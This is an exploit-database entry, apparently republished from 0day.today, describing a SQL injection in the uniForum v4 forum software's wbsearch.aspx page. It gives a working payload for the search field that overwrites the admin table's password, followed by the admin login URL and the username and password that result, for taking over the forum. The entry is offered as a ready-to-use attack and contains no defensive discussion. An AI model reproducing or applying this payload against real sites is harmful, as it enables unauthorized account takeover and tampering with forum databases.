id: 1378
date: 01/09/2007
title: uniForum <= v4 (wbsearch.aspx) Remote SQL Injection Vulnerability
author: ajann
cves: 

=================================================================
uniForum <= v4 (wbsearch.aspx) Remote SQL Injection Vulnerability
=================================================================



*******************************************************************************
# Title   :  uniForum <= v4 (wbsearch.aspx) Remote SQL Injection Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  ...
# Vendor  :  http://uniforum.biz/
# $$      :  $99

*******************************************************************************

[[SQL]]]---------------------------------------------------------

http://[target]/[path]//wbsearch.aspx (POST Method) [SQL]

Example:

//Fin the ->wbsearch.aspx Before, see "by User", it write ';update admin set Password='000245'--

Login Admin:http://www.xxx.com/[path]/wbadmlog.aspx
Username: Administrator
Password: 000245

[[/SQL]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!


#  0day.today [2023-03-22]  #